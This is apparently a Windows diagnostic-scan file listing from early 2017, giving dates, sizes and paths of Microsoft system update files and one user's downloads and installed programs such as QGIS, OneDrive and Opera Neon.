2017-03-14 15:42 - 2017-03-04 03:33 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2017-03-14 15:42 - 2017-03-04 03:33 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2017-03-14 15:42 - 2017-03-04 03:33 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2017-03-14 15:42 - 2017-03-04 03:33 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothDesktopHandlers.dll
2017-03-14 15:42 - 2017-03-04 03:33 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\XInputUap.dll
2017-03-14 15:42 - 2017-03-04 03:32 - 00249856 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-03-14 15:42 - 2017-03-04 03:32 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2017-03-14 15:42 - 2017-03-04 03:32 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2017-03-14 15:42 - 2017-03-04 03:32 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MediaFoundation.DefaultPerceptionProvider.dll
2017-03-14 15:42 - 2017-03-04 03:32 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2017-03-14 15:42 - 2017-03-04 03:31 - 00567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-03-14 15:42 - 2017-03-04 03:31 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2017-03-14 15:42 - 2017-03-04 03:30 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2017-03-14 15:42 - 2017-03-04 03:30 - 00463872 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-03-14 15:42 - 2017-03-04 03:30 - 00300544 _____ (Microsoft Corporation) C:\WINDOWS\system32\mscandui.dll
2017-03-14 15:42 - 2017-03-04 03:30 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2017-03-14 15:42 - 2017-03-04 03:30 - 00205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiohlp.dll
2017-03-14 15:42 - 2017-03-04 03:30 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2017-03-14 15:42 - 2017-03-04 03:29 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
2017-03-14 15:42 - 2017-03-04 03:29 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2017-03-14 15:42 - 2017-03-04 03:28 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-03-14 15:42 - 2017-03-04 03:28 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2017-03-14 15:42 - 2017-03-04 03:28 - 00623104 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPTpm12.dll
2017-03-14 15:42 - 2017-03-04 03:28 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll
2017-03-14 15:42 - 2017-03-04 03:28 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2017-03-14 15:42 - 2017-03-04 03:28 - 00267264 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2017-03-14 15:42 - 2017-03-04 03:28 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-03-14 15:42 - 2017-03-04 03:28 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-03-14 15:42 - 2017-03-04 03:27 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2017-03-14 15:42 - 2017-03-04 03:27 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-03-14 15:42 - 2017-03-04 03:27 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2017-03-14 15:42 - 2017-03-04 03:27 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2017-03-14 15:42 - 2017-03-04 03:27 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2017-03-14 15:42 - 2017-03-04 03:27 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2017-03-14 15:42 - 2017-03-04 03:26 - 00643072 _____ (Microsoft Corporation) C:\WINDOWS\system32\main.cpl
2017-03-14 15:42 - 2017-03-04 03:26 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-03-14 15:42 - 2017-03-04 03:26 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\system32\msutb.dll
2017-03-14 15:42 - 2017-03-04 03:26 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2017-03-14 15:42 - 2017-03-04 03:26 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-03-14 15:42 - 2017-03-04 03:26 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-03-14 15:42 - 2017-03-04 03:26 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2017-03-14 15:42 - 2017-03-04 03:25 - 01016320 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2017-03-14 15:42 - 2017-03-04 03:25 - 00526848 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-03-14 15:42 - 2017-03-04 03:24 - 01092096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplicationFrame.dll
2017-03-14 15:42 - 2017-03-04 03:24 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-03-14 15:42 - 2017-03-04 03:24 - 00655872 _____ (Microsoft Corporation) C:\WINDOWS\system32\sud.dll
2017-03-14 15:42 - 2017-03-04 03:24 - 00560128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-03-14 15:42 - 2017-03-04 03:24 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2017-03-14 15:42 - 2017-03-04 03:24 - 00478208 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXP.dll
2017-03-14 15:42 - 2017-03-04 03:24 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2017-03-14 15:42 - 2017-03-04 03:23 - 03753984 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll
2017-03-14 15:42 - 2017-03-04 03:23 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2017-03-14 15:42 - 2017-03-04 03:23 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-03-14 15:42 - 2017-03-04 03:23 - 00715776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-03-14 15:42 - 2017-03-04 03:23 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.UserAccountsHandlers.dll
2017-03-14 15:42 - 2017-03-04 03:22 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-03-14 15:42 - 2017-03-04 03:22 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-03-14 15:42 - 2017-03-04 03:21 - 00776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\TabletPC.cpl
2017-03-14 15:42 - 2017-03-04 03:21 - 00347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-03-14 15:42 - 2017-03-04 03:20 - 01913856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2017-03-14 15:42 - 2017-03-04 03:20 - 01361408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-03-14 15:42 - 2017-03-04 03:20 - 00893952 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-03-14 15:42 - 2017-03-04 03:20 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmWmiPl.dll
2017-03-14 15:42 - 2017-03-04 03:20 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2017-03-14 15:42 - 2017-03-04 03:19 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2017-03-14 15:42 - 2017-03-04 03:19 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\system32\tabcal.exe
2017-03-14 15:42 - 2017-03-04 03:18 - 01227264 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2017-03-14 15:42 - 2017-03-04 03:18 - 00320512 _____ (Microsoft Corporation) C:\WINDOWS\regedit.exe
2017-03-14 15:42 - 2017-03-04 03:17 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-03-14 15:42 - 2017-03-04 03:17 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2017-03-14 15:42 - 2017-03-04 03:16 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\vds.exe
2017-03-14 15:42 - 2017-03-04 03:16 - 00583168 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2017-03-14 15:42 - 2017-03-04 03:15 - 01443328 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSSVC.exe
2017-03-14 15:42 - 2017-03-04 03:14 - 01562112 _____ (Microsoft Corporation) C:\WINDOWS\system32\vssapi.dll
2017-03-14 15:42 - 2017-03-04 03:14 - 01547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbengine.exe
2017-03-14 15:42 - 2017-03-04 03:14 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2017-03-14 15:42 - 2017-03-04 03:14 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll
2017-03-14 15:42 - 2017-03-04 03:14 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe
2017-03-14 15:42 - 2017-03-04 03:13 - 05114368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2017-03-14 15:42 - 2017-03-04 03:13 - 00961024 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2fs.dll
2017-03-14 15:42 - 2017-03-04 03:13 - 00947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll
2017-03-14 15:42 - 2017-03-04 03:13 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2017-03-14 15:42 - 2017-03-04 03:13 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\MultiDigiMon.exe
2017-03-14 15:42 - 2017-03-04 03:12 - 01692160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-03-14 15:42 - 2017-03-04 03:12 - 00828416 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2017-03-14 15:42 - 2017-03-04 03:11 - 02611200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameux.dll
2017-03-14 15:42 - 2017-03-04 03:11 - 01656832 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-03-14 15:42 - 2017-03-04 03:11 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2017-03-14 15:42 - 2017-03-04 03:11 - 01312768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorDataService.exe
2017-03-14 15:42 - 2017-03-04 03:11 - 00818176 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2017-03-14 15:42 - 2017-03-04 03:10 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2017-03-14 15:42 - 2017-03-04 03:10 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2017-03-14 15:42 - 2017-03-04 03:10 - 00960000 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-03-14 15:42 - 2017-03-04 03:10 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2017-03-14 15:42 - 2017-03-04 03:09 - 00653824 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserLanguagesCpl.dll
2017-03-14 15:42 - 2017-03-04 03:08 - 01714688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dui70.dll
2017-03-14 15:42 - 2017-03-04 03:08 - 00629248 _____ (Microsoft Corporation) C:\WINDOWS\system32\hgcpl.dll
2017-03-14 15:42 - 2017-03-04 03:07 - 02512384 _____ (Microsoft Corporation) C:\WINDOWS\system32\themecpl.dll
2017-03-14 15:42 - 2017-03-04 03:07 - 01490944 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-03-14 15:42 - 2017-03-04 03:07 - 01064448 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-03-14 15:42 - 2017-03-04 03:07 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2017-03-14 15:42 - 2017-03-04 03:07 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\system32\stobject.dll
2017-03-14 15:42 - 2017-03-04 03:06 - 04060672 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbon.dll
2017-03-14 15:42 - 2017-03-04 03:06 - 02317824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-03-14 15:42 - 2017-03-04 03:06 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2017-03-14 15:42 - 2017-03-04 03:06 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll
2017-03-14 15:42 - 2017-03-04 03:05 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2017-03-14 15:42 - 2017-03-04 03:04 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe
2017-03-14 15:42 - 2017-03-04 03:03 - 01817088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-03-14 15:42 - 2017-03-04 03:01 - 03478528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbon.dll
2017-03-14 15:42 - 2016-07-15 23:29 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\CspCellularSettings.dll
2017-03-14 15:42 - 2016-07-15 23:28 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAPNCsp.dll
2017-03-14 15:42 - 2016-07-15 23:26 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\CfgSPCellular.dll
2017-03-14 15:41 - 2016-05-29 15:38 - 08886976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSetup.exe
2017-03-14 10:28 - 2017-03-14 10:33 - 40356836 _____ C:\Users\Helder\Downloads\03_rosa_costa_klein_geofrance.pdf
2017-03-11 17:31 - 2017-03-11 17:53 - 00000000 ____D C:\Users\Helder\Downloads\KODI-VLC
2017-03-11 16:14 - 2017-03-11 16:18 - 00000000 ____D C:\Users\TEMP.HELDER.009
2017-03-02 18:03 - 2017-03-02 18:06 - 00000000 ____D C:\Users\Helder\AppData\Roaming\OfficeRecovery.bbc323cc
2017-03-02 18:03 - 2017-03-02 18:03 - 00000000 ____D C:\Users\Helder\AppData\Roaming\OfficeRecovery
2017-03-02 18:02 - 2017-03-02 18:02 - 00002485 _____ C:\Users\Helder\Desktop\Recovery for Word.lnk
2017-03-02 18:02 - 2017-03-02 18:02 - 00000000 ____D C:\Users\Helder\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Recovery for Word
2017-03-02 18:02 - 2017-03-02 18:02 - 00000000 ____D C:\Users\Helder\AppData\Local\Apps\OfficeRecovery
2017-03-02 17:27 - 2017-03-02 17:27 - 00000000 ____D C:\Users\Helder\AppData\Local\OfficeBSCache-MyComputer
2017-02-22 20:23 - 2017-02-22 20:28 - 00000000 ____D C:\Users\TEMP.HELDER.008
2017-02-20 21:03 - 2017-02-20 21:03 - 00000000 ____D C:\Users\Helder\AppData\Roaming\PDF Producer
2017-02-18 15:07 - 2017-03-22 03:10 - 00004034 _____ C:\WINDOWS\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2017-02-18 14:05 - 2017-02-18 14:05 - 00459931 _____ C:\Users\Helder\Downloads\Não confirmado 692941.crdownload
2017-02-18 13:41 - 2017-02-28 19:10 - 00000000 ____D C:\Users\Helder\Downloads\Recursos QGIS
2017-02-16 15:22 - 2017-02-16 15:22 - 00002223 _____ C:\Users\Public\Desktop\Google Earth.lnk
2017-02-16 15:22 - 2017-02-16 15:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth
2017-02-08 14:35 - 2017-02-08 14:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2017-02-05 13:40 - 2017-02-05 13:43 - 33798230 _____ C:\Users\Helder\Downloads\aula_05-20170205T163954Z.zip
2017-02-04 23:49 - 2017-02-04 23:49 - 00018597 _____ C:\Users\Helder\Downloads\Anderson-Freire-Raridade-2013.rar
2017-02-04 23:45 - 2017-02-04 23:45 - 00019448 _____ C:\Users\Helder\Downloads\Aline-Barros-Extraordinário-Amor-de-Deus-2011 (1).rar
2017-02-04 23:44 - 2017-02-04 23:45 - 00019448 _____ C:\Users\Helder\Downloads\Aline-Barros-Extraordinário-Amor-de-Deus-2011.rar
2017-01-25 20:16 - 2017-02-17 15:14 - 00000000 ____D C:\Users\Helder\Downloads\Curso QGis - Bureau
2017-01-25 18:19 - 2017-02-28 18:53 - 00000000 ____D C:\Users\Helder\.matplotlib
2017-01-25 18:17 - 2017-02-28 18:51 - 00000000 ____D C:\Users\Helder\.qgis2
2017-01-25 17:56 - 2017-01-25 17:56 - 00001727 _____ C:\Users\Public\Desktop\OSGeo4W Shell.lnk
2017-01-25 17:56 - 2017-01-25 17:56 - 00000000 ____D C:\Users\Public\Desktop\QGIS 2.18
2017-01-25 17:53 - 2017-01-25 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QGIS 2.18
2017-01-25 17:53 - 2017-01-25 17:53 - 00001875 _____ C:\Users\Public\Desktop\GRASS GIS 7.2.0.lnk
2017-01-25 17:44 - 2017-01-25 18:12 - 00000000 ____D C:\Users\Helder\Documents\GIS DataBase
2017-01-25 17:44 - 2017-01-25 17:56 - 00000000 ____D C:\Program Files\QGIS 2.18
2017-01-25 15:25 - 2017-01-25 17:43 - 390663002 _____ C:\Users\Helder\Downloads\QGIS-OSGeo4W-2.18.3-1-Setup-x86_64.exe
2017-01-25 14:49 - 2017-01-25 14:49 - 00001264 _____ C:\Users\Helder\Downloads\860e34796447dafa200381e318496738746b741c.dlc
2017-01-25 14:49 - 2017-01-25 14:49 - 00001264 _____ C:\Users\Helder\Downloads\860e34796447dafa200381e318496738746b741c (2).dlc
2017-01-25 14:49 - 2017-01-25 14:49 - 00001264 _____ C:\Users\Helder\Downloads\860e34796447dafa200381e318496738746b741c (1).dlc
2017-01-25 14:36 - 2016-12-21 04:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2017-01-25 14:36 - 2016-12-21 01:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2017-01-23 16:41 - 2017-01-23 16:41 - 00002311 _____ C:\Users\Usuário Padrão\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-01-23 16:41 - 2017-01-23 16:41 - 00002311 _____ C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-01-23 16:41 - 2017-01-23 16:41 - 00002311 _____ C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-01-23 16:40 - 2017-01-23 16:40 - 00000000 ____D C:\Program Files (x86)\Microsoft OneDrive
2017-01-23 16:40 - 2017-01-23 16:39 - 21628640 _____ (Microsoft Corporation) C:\Users\Helder\Downloads\OneDriveSetup.exe
2017-01-23 10:05 - 2017-01-23 10:05 - 00000000 ____D C:\Users\Helder\AppData\Local\YSearchUtil
2017-01-23 10:05 - 2017-01-23 10:05 - 00000000 ____D C:\Program Files (x86)\Yahoo!
2017-01-18 11:47 - 2017-01-18 11:49 - 00413564 _____ C:\WINDOWS\Minidump\011817-45156-01.dmp
2017-01-17 11:29 - 2017-01-17 11:29 - 00002584 _____ C:\Users\Helder\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera Neon.lnk
2017-01-17 11:29 - 2017-01-17 11:29 - 00002576 _____ C:\Users\Helder\Desktop\Opera Neon.lnk
2017-01-17 11:29 - 2017-01-17 11:29 - 00000000 ____D C:\Users\Helder\AppData\Local\Opera Software
2017-01-17 11:27 - 2017-01-17 11:28 - 02437672 _____ C:\Users\Helder\Downloads\OperaNeonSetup.exe
2017-01-10 17:48 - 2016-12-21 04:08 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
2017-01-10 17:48 - 2016-12-21 01:40 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-01-10 17:48 - 2016-12-21 01:39 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-01-10 17:47 - 2016-12-21 01:43 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
2017-01-10 17:47 - 2016-12-21 01:41 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
2017-01-10 17:47 - 2016-12-21 01:40 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-01-10 17:47 - 2016-12-21 01:38 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2017-01-10 17:47 - 2016-12-14 01:38 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
2017-01-10 17:47 - 2016-12-14 01:24 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2017-01-10 17:46 - 2016-12-21 03:51 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-01-10 17:46 - 2016-12-14 01:23 - 03134976 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2017-01-10 17:45 - 2016-12-21 05:08 - 00245600 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2017-01-10 17:45 - 2016-12-21 05:08 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll
2017-01-10 17:45 - 2016-12-21 02:59 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
2017-01-10 17:45 - 2016-12-14 02:23 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-01-10 17:45 - 2016-12-14 02:17 - 00319288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2017-01-10 17:45 - 2016-12-14 01:43 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-01-10 17:45 - 2016-12-14 01:42 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSCard.dll
2017-01-10 17:45 - 2016-12-14 01:42 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSCard.dll
2017-01-10 17:45 - 2016-12-14 01:35 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-01-10 17:45 - 2016-12-14 01:35 - 00600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
2017-01-10 17:45 - 2016-12-14 01:35 - 00553984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
2017-01-10 17:45 - 2016-12-14 01:26 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-01-10 17:45 - 2016-12-14 01:24 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-01-10 17:44 - 2016-12-21 03:59 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2017-01-10 17:44 - 2016-12-21 01:30 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
2017-01-10 17:43 - 2016-12-21 04:43 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-01-10 17:43 - 2016-12-21 04:09 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2017-01-10 17:43 - 2016-12-21 01:40 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll
2017-01-10 17:43 - 2016-12-14 02:01 - 00076984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
2017-01-10 17:43 - 2016-12-14 01:42 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
2017-01-10 17:42 - 2016-12-21 03:49 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2017-01-10 17:42 - 2016-12-14 02:01 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2017-01-10 17:41 - 2016-12-14 01:22 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2017-01-10 17:40 - 2016-12-14 01:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-01-10 17:39 - 2016-12-21 04:09 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2017-01-10 17:39 - 2016-12-21 04:08 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-01-10 17:39 - 2016-12-21 04:06 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-01-10 17:39 - 2016-12-14 01:46 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2017-01-10 17:39 - 2016-12-14 01:42 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2017-01-10 17:39 - 2016-12-14 01:39 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-01-10 17:39 - 2016-12-14 01:36 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-01-10 17:39 - 2016-12-14 01:25 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2017-01-10 17:39 - 2016-12-14 01:23 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-01-10 17:39 - 2016-11-02 07:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-01-10 17:38 - 2016-12-21 04:07 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-01-10 17:38 - 2016-12-21 03:57 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsettingsprovider.dll
2017-01-10 17:38 - 2016-12-14 02:33 - 01356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2017-01-10 17:38 - 2016-12-14 02:18 - 00715104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-01-10 17:38 - 2016-12-14 02:14 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2017-01-10 17:38 - 2016-12-14 02:14 - 00089416 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
2017-01-10 17:38 - 2016-12-14 01:41 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-01-10 17:38 - 2016-12-14 01:39 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
2017-01-10 17:38 - 2016-11-02 08:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-01-10 17:38 - 2016-11-02 07:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-01-10 17:37 - 2016-12-21 03:54 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2017-01-10 17:36 - 2016-12-21 04:12 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2017-01-10 17:35 - 2016-12-21 04:37 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-01-10 17:35 - 2016-12-14 02:18 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
